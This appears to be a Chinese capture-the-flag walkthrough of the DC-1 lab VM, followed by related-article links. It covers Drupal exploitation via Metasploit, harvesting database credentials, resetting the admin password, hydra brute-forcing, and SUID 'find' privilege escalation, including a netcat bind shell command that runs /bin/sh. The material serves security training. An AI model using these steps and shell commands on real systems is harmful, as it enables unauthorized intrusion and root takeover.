1.靶机IP地址发现

2.查看靶机版本和服务

  • -sV:用来扫描目标主机和端口上运行的软件的版本
  • -p-:扫描0-65535全部端口
  • -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描
  • -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火墙保护的主机时,这是非常有用的。
  • -A参数:综合扫描。比较慢,不推荐
  • -n:用于禁用反向DNS解析

111端口是SUN公司的RPC(Remote Procedure Call,远程过程调用)服务所开放的端口,主要用于分布式系统中不同计算机的内部进程通信,RPC在多种网络服务中都是很重要的组件。常见的RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等等。在Microsoft的Windows中,同样也有RPC服务。

3.访问IP地址网页

Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。

页面信息收集思路:

尝试访问敏感文件robots.txt、扫目录、用户名和密码爆破、Whatweb扫描、看网页源码(看有没有信息可利用)、Powered by  drupal(找cms相关漏洞)、扫描备份文件、密码重置

4.目录扫描

方法一:可以用dirb命令扫描

方法二:用御剑工具进行扫描(由于速度较慢,在这里就不截图了)

直接查看敏感文件robots.txt

        

5.漏洞搜索

方法一:谷歌、bing、百度搜索drupal 7 漏洞

方法二:打开msfconsole进行搜索

从上述搜索结果来看,有OpenID外部实体注入、用户枚举、sql注入、远程命令执行、远程PHP代码执行、web服务反序列化RCE、PHP XML-RPC任意代码执行漏洞

5.漏洞利用

就选那个上面列举的、我没有译出来的一个模块漏洞吧

设置rhosts靶机IP地址,然后进行exploit

注:成功的小伙伴直接往下滑动浏览看后续成功后的步骤(建议在此设置快照,防止后面出错)

不知道什么原因失败了,可能是已经打了补丁,总之没有会话建立,查看靶机居然变成了这样

尝试回车,又恢复了正常

再次exploit依旧失败,刷新访问网页,报错,应该是80端口除了问题

使用nmap查看端口状态,显示80端口已过滤

于是我又尝试将靶机的网卡手动重启,再次查看80端口恢复了……

重新进行模块利用,依旧exploit失败,回到之前的错误,死循环!

没办法,我第二天又换了一个DC-1的靶机,结果成功了,很显然靶机出了问题

此时kali机IP地址:192.168.109.159 ,靶机IP地址:192.168.109.160

输入shell,进行交互,查看当前用户

使用python 切成交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'  ,查看当前目录下文件发现flag1.txt

文件提示cms需要一个config文件,搜索一下drupal的配置文件

进入该路径下,并查看文件,flag2 提示暴力破解不是唯一的方法

往下看,还发现了一些数据库信息:数据库名dbuser,数据库密码R0ck3t

尝试登录数据库

发现存在两个库,进入drupaldb库下,看看有没有用户表

……

发现用户表,查看有哪些用户,发现drupal密码存储方式看不大懂,网页搜索了解一下,drupal是把密码和用户名或其它随机字符串组合在一起后使用 MD5 方式加密。

注意:获取admin密码还有以下两种方案:

  • 这一步想要用hashcat暴力破解的小伙伴可参考:https://klionsec.github.io/2017/04/26/use-hashcat-crack-hash/
  • 采取密码重置方法(即drupal7忘记管理员密码):https://www.yuzhi100.com/article/drupal-7-chongzhi-guanliyuan-mima

我这里没有采取上面两种方法,而是用drupal自带的脚本 password-hash.sh 进行加密,密码为 drupal

在数据库中修改admin的密码为drupal

获取用户名admin,密码drupal后,在访问主页登录(注:靶机ip地址由于重启发生改变,不影响下面操作)

发现了flag3文件,打开看看

flag3提示,需要用到perm找到passwd,但需要执行该命令来确定如何获取shadow中的内容。

查看用户信息

尝试查看/etc/shadow 失败,如果得知/etc/shadow 和 /etc/passwd 可以使用John the Ripper破解密码

/etc/shadow 敏感文件,储存加密后的用户密码(一般是哈希值)

可参考:https://www.cyberciti.biz/faq/understanding-etcshadow-file/

通过hydra爆破,获取用户flag4的密码为orange

从/etc/passwd文件中获取了flag4的路径,进入该路径并查看相关文件flag4.txt

根据提示,需要获取root权限,可使用suid进行提权,查找正在系统上运行的所有suid可执行文件

以上所有二进制文件都将以root用户权限来执行,准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。因为它们的权限中包含“s”,并且它们的属主为root。如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root具有提权功能的Linux可执行文件包括:Nmap、Vim、find、Bash、More、Less、Nano、cp。

发现find命令位于suid权限位,查看find权限

创建空文件test,并执行命令如下

至此,提权成功!

还可以切换用户,使用用户flag4进行提权操作(大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root)

在flag4用户下执行:find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

打开kali新窗口:nc 靶机IP地址 5555         输入whoami,得到root权限       如下图例所示:

靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权相关推荐

  1. 【经典漏洞回顾】Microsoft Windows Win32k本地提权漏洞分析(CVE-2015-0057)

    漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-0057 漏洞类型:UAF 影响范围:Windows Server 2003 ...

  2. sqlite字段是否存在_【漏洞预警】Linux内核存在本地提权漏洞(CVE20198912)

    更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn) 漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地 ...

  3. [漏洞分析] CVE-2022-0995 watch_queue 1bit “溢出“内核提权

    CVE-2022-09095 watch_queue 1bit "溢出"内核提权 文章目录 CVE-2022-09095 watch_queue 1bit "溢出&quo ...

  4. [漏洞分析] CVE-2022-0847 Dirty Pipe linux内核提权分析

    CVE-2022-0847 Dirty Pipe linux内核提权分析 文章目录 CVE-2022-0847 Dirty Pipe linux内核提权分析 漏洞简介 环境搭建 漏洞原理 漏洞发生点 ...

  5. 2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权(转)

    靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnh ...

  6. arm linux漏洞,GitHub - armjirawat/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合...

    CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-1000112 [a memory corruption due to UFO to ...

  7. Android提权漏洞CVE-2014-7920CVE-2014-7921分析

    作者:没羽@阿里移动安全,更多技术干货,请访问阿里聚安全博客 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到me ...

  8. Android提权漏洞CVE-2014-7920CVE-2014-7921分析 1

    没羽@阿里移动安全,更多安全类技术干货,请访问阿里聚安全博客 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到me ...

  9. 第59天-权限提升-Win 溢出漏洞及 ATSCPS 提权

    思维导图 知识点 #明确权限提升基础知识:权限划分 #明确权限提升环境问题: WEB 及本地 #明确权限提升方法针对:针对方法适应问题 #明确权限提升针对版本:个人及服务器版本;针对方法; 知识点必备 ...

最新文章

  1. c#调用java开发的webservice_用C#.NET调用Java开发的WebService传递int,double问题
  2. 独家 | 一文读懂概率论学习:贝叶斯理论(附链接)
  3. python numpy库等差不均分_numpy.linspace 生成等差数组的方法
  4. Tkinter Helloword !
  5. iptables禁止端口和开放端口
  6. 血的教训--如何正确使用线程池submit和execute方法
  7. 有了vue为什么还学react?
  8. 2008.10 井冈山-金秋 【律动音符篇】
  9. ros开发增加clion常用模板及初始化配置(六)
  10. android ctrl 左键鼠标左键直接打开xml文件夹,设置Android Studio通过Ctrl+左键查看源码...
  11. C语言·数组·密码编译(阿斯克码法)
  12. arm架构与体系结构
  13. ceph deep scrub扫描的脚本
  14. es搜索同义词近义词技术方案
  15. 登录到接受邮件服务器,使用outlook2016配置imap 登陆到接收服务器(imap) 失败
  16. Android更换字体
  17. 来自CodeSmith的震撼
  18. 小程序or网页前端CSS选择器
  19. Abbreviation----Java实现
  20. LintCode 141. 对x开根 JavaScript算法

热门文章

  1. 基于FPGA的16QAM调制器verilog实现,包括testbench,并通过MATLAB显示FPGA输出信号的星座图
  2. 你想要的100套HTML模板
  3. 电力监控系统在电力系统中的应用
  4. 计算机的软盘有没有磁性材料,磁性材料竟然还有如此惊人的历史!
  5. 英语四级单词频率统计及翻译
  6. 《OpenCv视觉之眼》Python图像处理五 :Opencv图像去噪处理之均值滤波、方框滤波、中值滤波和高斯滤波
  7. 【Java】Java GUI制作Windows桌面程序,利用windowbuilder生成界面,使用exe4j打包成可执行文件,使用Inno Setup打包成安装包,超级详细教程
  8. C语言宏定义的几个坑和特殊用法
  9. 【mac】mac鼠标指针跟随很慢的问题
  10. Halcon常用算子(库函数)整理